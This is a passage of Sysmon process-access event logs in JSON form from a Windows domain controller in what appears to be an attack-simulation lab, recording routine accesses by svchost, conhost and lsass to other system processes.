6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-00107FAD1100}\r\nSourceProcessId: 3592\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22B6-5F25-0000-00101FC91000}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-00107FAD1100}","SourceProcessId":"3592","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22B6-5F25-0000-00101FC91000}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
